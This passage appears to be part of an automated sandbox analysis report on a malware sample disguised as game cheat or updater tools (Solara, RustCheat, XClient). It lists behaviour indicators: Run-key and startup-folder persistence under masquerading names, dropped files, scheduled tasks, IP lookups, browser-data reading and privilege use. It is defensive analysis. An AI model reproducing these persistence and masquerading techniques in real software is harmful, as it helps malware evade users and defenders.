| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Local\Temp\Solara_Updater.exe | N/A |
| Key value queried | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\Control Panel\International\Geo\Nation | C:\Windows\SysWOW64\WScript.exe | N/A |
Drops startup file
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svhost.lnk | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
Executes dropped EXE
Reads user/profile data of web browsers
Adds Run key to start application
| Description | Indicator | Process | Target |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\svhost = "C:\\Users\\Admin\\AppData\\Roaming\\svhost.exe" | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\hostNet\\RuntimeBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Users\\Default User\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\WindowsRE\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Users\\Default User\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\fontdrvhost = "\"C:\\Users\\All Users\\Templates\\fontdrvhost.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara_Updater = "\"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\bridgeblockportComBroker = "\"C:\\hostNet\\bridgeblockportComBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\RuntimeBroker = "\"C:\\hostNet\\RuntimeBroker.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\wscript = "\"C:\\Recovery\\WindowsRE\\wscript.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Set value (str) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Solara_Updater = "\"C:\\Program Files (x86)\\Microsoft\\Solara_Updater.exe\"" | C:\hostNet\bridgeblockportComBroker.exe | N/A |
Looks up external IP address via web service
| Description | Indicator | Process | Target |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ipinfo.io | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
| N/A | ip-api.com | N/A | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File created | \??\c:\Windows\System32\CSC94C34EF13D4D4F8881CC8A1FBB80DA17.TMP | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
| File created | \??\c:\Windows\System32\t4pfwd.exe | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe | N/A |
Drops file in Program Files directory
| Description | Indicator | Process | Target |
| File created | C:\Program Files (x86)\Microsoft\5b8d2ee93f0f21 | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| File created | C:\Program Files (x86)\Microsoft\Solara_Updater.exe | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| File opened for modification | C:\Program Files (x86)\Microsoft\Solara_Updater.exe | C:\hostNet\bridgeblockportComBroker.exe | N/A |
Drops file in Windows directory
| Description | Indicator | Process | Target |
| File created | C:\Windows\diagnostics\WmiPrvSE.exe | C:\hostNet\bridgeblockportComBroker.exe | N/A |
Enumerates physical storage devices
Creates scheduled task(s)
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\System32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Detects videocard installed
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| N/A | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
Modifies registry class
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\hostNet\bridgeblockportComBroker.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
| Key created | \REGISTRY\USER\S-1-5-21-1162180587-977231257-2194346871-1000_Classes\Local Settings | C:\Users\Admin\AppData\Local\Temp\sol.exe | N/A |
Runs ping.exe
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
| N/A | N/A | C:\Windows\system32\PING.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\Loader.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\XClient.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\RustCheat.exe | N/A |
| Token: SeIncreaseQuotaPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSecurityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeTakeOwnershipPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeLoadDriverPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemProfilePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeSystemtimePrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeProfSingleProcessPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
| Token: SeIncBasePriorityPrivilege | N/A | C:\Windows\System32\Wbem\wmic.exe | N/A |
